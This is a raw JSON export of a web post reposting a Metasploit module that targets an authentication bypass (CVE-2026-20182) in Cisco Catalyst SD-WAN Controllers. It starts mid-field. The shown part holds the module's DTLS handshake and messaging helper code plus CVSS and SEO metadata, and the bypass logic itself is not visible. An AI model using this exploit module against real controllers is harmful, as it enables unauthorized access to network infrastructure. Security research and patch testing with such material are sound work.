  paths \\u003c\\u003c \\&#8221;#{dir}\/lib#{name}-3-x64.dll\\&#8221;\\n                     paths \\u003c\\u003c \\&#8221;#{dir}\/lib#{name}-3.dll\\&#8221;\\n                     paths \\u003c\\u003c \\&#8221;#{dir}\/lib#{name}-1_1-x64.dll\\&#8221;\\n                   end\\n                   paths += %W[lib#{name}-3-x64 lib#{name}-3 lib#{name}]\\n                   paths\\n                 when \/darwin\/\\n                   %W[\\n                     \/usr\/local\/opt\/openssl@3\/lib\/lib#{name}.3.dylib\\n                     \/usr\/local\/opt\/openssl\/lib\/lib#{name}.dylib\\n                     \/opt\/homebrew\/opt\/openssl@3\/lib\/lib#{name}.3.dylib\\n                     \/opt\/homebrew\/opt\/openssl\/lib\/lib#{name}.dylib\\n                     \/opt\/local\/lib\/lib#{name}.3.dylib\\n                     \/opt\/local\/lib\/lib#{name}.dylib\\n                   ]\\n                 else\\n                   %W[\\n                     lib#{name}.so.3\\n                     lib#{name}.so.1.1\\n                     lib#{name}.so\\n                   ]\\n                 end\\n\\n    candidates.each do |path|\\n      next if path.start_with?(&#8216;\/&#8217;) \\u0026\\u0026 !File.exist?(path)\\n\\n      return Fiddle.dlopen(path)\\n    rescue Fiddle::DLError\\n      next\\n    end\\n    fail_with(Failure::NotFound, \\&#8221;Cannot find lib#{name}. Ensure OpenSSL is installed.\\&#8221;)\\n  end\\n\\n  def bind_function(lib, name, args, ret)\\n    Fiddle::Function.new(lib[name], args, ret)\\n  end\\n\\n  def bio_ctrl_pending(bio)\\n    @f_bio_ctrl.call(bio, BIO_CTRL_PENDING, 0, Fiddle::NULL)\\n  end\\n\\n  def handle_dtls_timeout(ssl)\\n    @f_ssl_ctrl.call(ssl, DTLS_CTRL_HANDLE_TIMEOUT, 0, Fiddle::NULL)\\n  end\\n\\n  def drain_openssl_errors\\n    msgs = []\\n    loop do\\n      code = @f_err_get_error.call\\n      break if code == 0\\n\\n      buf = Fiddle::Pointer.malloc(256, Fiddle::RUBY_FREE)\\n      @f_err_error_string_n.call(code, buf, 256)\\n      msgs \\u003c\\u003c buf.to_s\\n    end\\n    msgs\\n  end\\n\\n  # Drive the DTLS handshake state machine, shuttling data between the\\n  # SSL engine and the UDP socket via memory BIOs.\\n  def do_dtls_handshake(ssl, rbio, wbio, udp_sock)\\n    retries = 0\\n\\n    loop do\\n      @f_err_clear_error.call\\n      ret = @f_ssl_connect.call(ssl)\\n      flush_wbio(wbio, udp_sock)\\n\\n      break if ret == 1\\n\\n      err = @f_ssl_get_error.call(ssl, ret)\\n      case err\\n      when SSL_ERROR_WANT_READ\\n        ready = ::IO.select([udp_sock], nil, nil, HANDSHAKE_TIMEOUT)\\n        if ready\\n          begin\\n            dgram = udp_sock.recvfrom(65_536)[0]\\n            @f_bio_write.call(rbio, dgram, dgram.bytesize)\\n          rescue ::IO::WaitReadable\\n            retries += 1\\n            fail_with(Failure::Unreachable, \\&#8221;DTLS handshake timeout after #{retries} retries\\&#8221;) if retries \\u003e MAX_HANDSHAKE_RETRIES\\n\\n            handle_dtls_timeout(ssl)\\n            flush_wbio(wbio, udp_sock)\\n          end\\n        else\\n          retries += 1\\n          fail_with(Failure::Unreachable, \\&#8221;DTLS handshake timeout after #{retries} retries\\&#8221;) if retries \\u003e MAX_HANDSHAKE_RETRIES\\n\\n          handle_dtls_timeout(ssl)\\n          flush_wbio(wbio, udp_sock)\\n        end\\n      when SSL_ERROR_WANT_WRITE\\n        flush_wbio(wbio, udp_sock)\\n      else\\n        errors = drain_openssl_errors\\n        fail_with(Failure::Unknown, \\&#8221;DTLS handshake failed (SSL error #{err}): #{errors.join(&#8216;; &#8216;)}\\&#8221;)\\n      end\\n    end\\n  end\\n\\n  def flush_wbio(wbio, udp_sock)\\n    loop do\\n      pending = bio_ctrl_pending(wbio)\\n      break if pending \\u003c= 0\\n\\n      buf = Fiddle::Pointer.malloc(pending, Fiddle::RUBY_FREE)\\n      n = @f_bio_read.call(wbio, buf, pending)\\n      break if n \\u003c= 0\\n\\n      udp_sock.write(buf.to_str(n))\\n    end\\n  end\\n\\n  def dtls_send(ssl, wbio, udp_sock, data)\\n    @f_err_clear_error.call\\n    ret = @f_ssl_write.call(ssl, data, data.bytesize)\\n    if ret \\u003c= 0\\n      err = @f_ssl_get_error.call(ssl, ret)\\n      errors = drain_openssl_errors\\n      fail_with(Failure::Unknown, \\&#8221;SSL_write failed (error #{err}): #{errors.join(&#8216;; &#8216;)}\\&#8221;)\\n    end\\n    flush_wbio(wbio, udp_sock)\\n    ret\\n  end\\n\\n  def dtls_recv(ssl, rbio, _wbio, udp_sock, timeout: 10)\\n    ready = ::IO.select([udp_sock], nil, nil, timeout)\\n    return nil unless ready\\n\\n    begin\\n      dgram = udp_sock.recvfrom(65_536)[0]\\n    rescue ::IO::WaitReadable\\n      return nil\\n    end\\n\\n    @f_bio_write.call(rbio, dgram, dgram.bytesize)\\n\\n    @f_err_clear_error.call\\n    ret = @f_ssl_read.call(ssl, @recv_buf, RECV_BUF_SIZE)\\n    if ret \\u003c= 0\\n      err = @f_ssl_get_error.call(ssl, ret)\\n      return nil if err == SSL_ERROR_WANT_READ\\n\\n      vprint_status(\\&#8221;SSL_read error: #{err}\\&#8221;)\\n      return nil\\n    end\\n\\n    @recv_buf.to_str(ret).b\\n  end\\n\\n  def cleanup_dtls(ssl, ctx, udp_sock)\\n    if ssl\\n      begin\\n        @f_ssl_free.call(ssl)\\n      rescue ::StandardError\\n        nil\\n      end\\n    end\\n\\n    if ctx\\n      begin\\n        @f_ssl_ctx_free.call(ctx)\\n      rescue ::StandardError\\n        nil\\n      end\\n    end\\n\\n    begin\\n      udp_sock\\u0026.close\\n    rescue ::StandardError\\n      nil\\n    end\\n  end\\nend\\n&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/auxiliary\/admin\/networking\/cisco_sdwan_vhub_auth_bypass.rb&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:10,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/admin\/networking\/cisco_sdwan_vhub_auth_bypass\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-05-15T19:28:09&#8243;,&#8221;description&#8221;:&#8221;This module exploits an authentication bypass vulnerability CVE-2026-20182 in the Cisco Catalyst SD-WAN Controller. The vdaemon DTLS control-plane service performs no certificate or credential verification&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,36,12,169,13,7,11,5],"class_list":["post-54918","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Cisco Catalyst SD-WAN Controller vHub Authentication Bypass_MSF:AUXILIARY-ADMIN-NETWORKING-CISCO_SDWAN_VHUB_AUTH_BYPASS- zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=54918\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Cisco Catalyst SD-WAN Controller vHub Authentication Bypass_MSF:AUXILIARY-ADMIN-NETWORKING-CISCO_SDWAN_VHUB_AUTH_BYPASS- zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-05-15T19:28:09&#8243;,&#8221;description&#8221;:&#8221;This module exploits an authentication bypass vulnerability CVE-2026-20182 in the Cisco Catalyst SD-WAN Controller. The vdaemon DTLS control-plane service performs no certificate or credential verification...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=54918\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-05-15T14:35:49+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"23 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=54918#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=54918\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Cisco Catalyst SD-WAN Controller vHub Authentication Bypass_MSF:AUXILIARY-ADMIN-NETWORKING-CISCO_SDWAN_VHUB_AUTH_BYPASS-\",\"datePublished\":\"2026-05-15T14:35:49+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=54918\"},\"wordCount\":4591,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-10.0\",\"exploit\",\"metasploit\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=54918#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=54918\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=54918\",\"name\":\"Cisco Catalyst SD-WAN Controller vHub Authentication Bypass_MSF:AUXILIARY-ADMIN-NETWORKING-CISCO_SDWAN_VHUB_AUTH_BYPASS- zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-05-15T14:35:49+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=54918#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=54918\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=54918#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Cisco Catalyst SD-WAN Controller vHub Authentication Bypass_MSF:AUXILIARY-ADMIN-NETWORKING-CISCO_SDWAN_VHUB_AUTH_BYPASS-\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Cisco Catalyst SD-WAN Controller vHub Authentication Bypass_MSF:AUXILIARY-ADMIN-NETWORKING-CISCO_SDWAN_VHUB_AUTH_BYPASS- zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=54918","og_locale":"en_US","og_type":"article","og_title":"Cisco Catalyst SD-WAN Controller vHub Authentication Bypass_MSF:AUXILIARY-ADMIN-NETWORKING-CISCO_SDWAN_VHUB_AUTH_BYPASS- zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-05-15T19:28:09&#8243;,&#8221;description&#8221;:&#8221;This module exploits an authentication bypass vulnerability CVE-2026-20182 in the Cisco Catalyst SD-WAN Controller. The vdaemon DTLS control-plane service performs no certificate or credential verification...","og_url":"https:\/\/zero.redgem.net\/?p=54918","og_site_name":"zero redgem","article_published_time":"2026-05-15T14:35:49+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"23 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=54918#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=54918"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Cisco Catalyst SD-WAN Controller vHub Authentication Bypass_MSF:AUXILIARY-ADMIN-NETWORKING-CISCO_SDWAN_VHUB_AUTH_BYPASS-","datePublished":"2026-05-15T14:35:49+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=54918"},"wordCount":4591,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-10.0","exploit","metasploit","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=54918#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=54918","url":"https:\/\/zero.redgem.net\/?p=54918","name":"Cisco Catalyst SD-WAN Controller vHub Authentication Bypass_MSF:AUXILIARY-ADMIN-NETWORKING-CISCO_SDWAN_VHUB_AUTH_BYPASS- zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-05-15T14:35:49+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=54918#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=54918"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=54918#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Cisco Catalyst SD-WAN Controller vHub Authentication Bypass_MSF:AUXILIARY-ADMIN-NETWORKING-CISCO_SDWAN_VHUB_AUTH_BYPASS-"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/54918","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=54918"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/54918\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=54918"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=54918"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=54918"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}